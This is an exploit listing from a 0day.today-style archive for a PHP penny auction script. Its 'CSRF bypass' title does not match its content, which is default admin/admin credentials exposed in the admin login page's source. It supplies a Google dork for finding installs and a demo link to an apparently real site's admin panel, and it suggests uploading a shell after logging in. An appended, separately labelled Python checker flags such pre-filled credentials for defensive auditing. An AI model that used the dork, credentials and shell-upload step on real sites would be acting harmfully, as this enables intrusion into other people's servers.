Penny Auction Script CSRF Bypass (View Source) Vulnerability

2012-03-03T00:00:00
ID 1337DAY-ID-17612
Type zdt
Reporter alajman
Modified 2012-03-03T00:00:00

Description

Exploit for php platform in category web applications

                                        
#Title: Auction CSRF Bypass (View Source) Vulnerability

#Author: hacker alajman  

#Mail : [email protected]

#Software Link : http://www.phppennyauction.com/  

#Version: 1.0

#Google Dork: inurl:static_page id=20 -''+++ 9:59am - Perigaum Parsifal Automatik / P-0504-STW - End price: $5.11 - Savings: 97%''
 
-------------------------- Put the vulnerability after this ------------

Auction

Exploit:


www.xxx.com/auction/admin.php

/auction/admin.php


Login

Then go to View Source

   <td><input class="input_120" name="username" value="admin"type="text" /></td>

  <td ><input class="input_120" name="password" value="admin"  type="password" /></td>

''value="admin"''
''value="admin"''

user: admin
pass: admin

And you can upload a shell after login
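
The login form above renders working credentials into its value attributes. As an added example (not part of the original advisory or the product's code), this Python check flags that condition in a rendered login page; both sample forms are constructed from the two quoted fields, and the class, function and field-name list are hypothetical.

```python
from html.parser import HTMLParser

# Constructed sample: the two fields quoted in the advisory, wrapped in a form.
VULNERABLE = '''<form method="post" action="admin.php">
<td><input class="input_120" name="username" value="admin"type="text" /></td>
<td ><input class="input_120" name="password" value="admin"  type="password" /></td>
<input type="submit" value="Login" /></form>'''

# Constructed sample of the corrected form: no credential is rendered into the page.
FIXED = '''<form method="post" action="admin.php">
<td><input class="input_120" name="username" type="text" autocomplete="username" /></td>
<td><input class="input_120" name="password" type="password" value="" /></td>
<input type="submit" value="Login" /></form>'''

# Assumed list of field names treated as login identifiers.
LOGIN_NAMES = {"username", "user", "login", "email"}


class PrefilledCredentialAudit(HTMLParser):
    """Records <input> fields whose value attribute carries a credential."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):  # also called for <input ... />
        if tag != "input":
            return
        attr = {k: (v or "") for k, v in attrs}
        name = attr.get("name", "").lower()
        kind = attr.get("type", "text").lower()
        if not attr.get("value", "").strip():
            return  # empty or absent value: nothing leaked in the markup
        if kind == "password":
            self.findings.append((name, "password rendered in page source"))
        elif kind == "text" and name in LOGIN_NAMES:
            self.findings.append((name, "login name pre-filled"))


def audit_login_form(html):
    """Return (field name, issue) pairs for credentials embedded in a form."""
    parser = PrefilledCredentialAudit()
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for label, page in (("vulnerable", VULNERABLE), ("fixed", FIXED)):
        print(label, audit_login_form(page))
```

Removing the value attributes stops the disclosure in the page source; the admin/admin account itself still has to be given a new password.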

Youtube

http://www.youtube.com/watch?v=S-MsP6qwViQ&feature=player_embedded

Video 

http://www.root-alajman.com/hacker%20alajman.zip

##
Demo

http://www.bioborder.com/auction/admin.php



########################

#########Greetz: Hacker alajman / AnGer Hacker / G-B /#########



#  0day.today [2018-04-14]  #